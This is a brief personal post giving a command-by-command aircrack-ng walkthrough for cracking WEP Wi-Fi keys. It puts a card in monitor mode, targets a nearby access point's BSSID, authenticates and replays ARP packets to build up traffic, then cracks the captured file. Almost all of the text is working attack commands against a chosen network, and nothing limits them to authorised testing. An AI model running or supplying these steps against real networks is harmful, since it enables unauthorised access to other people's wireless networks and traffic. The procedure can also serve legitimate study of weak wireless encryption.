I know this is a well-established attack but it’s good practice

Crack WEP wireless with aircrack/airmon

#/etc/init.d/networking start
#airmon-ng    – To identify your wireless card to use. I have wlan0 and wlan1
#airmon-ng stop wlan1 (Wlan0 is internal)
#airmon-ng start wlan1    – (monitor mode enabled on mon0)
#airmon-ng to view status. Shows mon0 listening on wlan1
#airodump-ng wlan1 to scan for bssids/view wireless networks nearby
    – Starts to fill screen with nearby base stations
    – Look at all the WEP!
#airodump-ng -w wep -c 6 –bssid 00:1F:90:FC:CC:00 wlan1
    – Configures your wireless card to that particular connection
    – Let that run and open a new window and enter
#aireplay-ng -1 0 -a 00:1F:90:FC:CC:00 wlan1
    – Associates your wireless with that base station so you can send/receive data on that chan
    – Shows the below:
root@root:~# aireplay-ng -1 0 -a 00:1F:90:FC:CC:00 wlan1
No source MAC (-h) specified. Using the device MAC (00:C0:CA:47:30:DA)

#aireplay-ng -3 -b 00:1F:90:FC:CC:00 wlan1
    – Sends and receives packets on the connection
    – Run window 1 for 30,000 packets
    – Then check your cwd for .cap files
– ctrl+C in the first term, dir to find cap file
#aircrack-ng [filename].cap
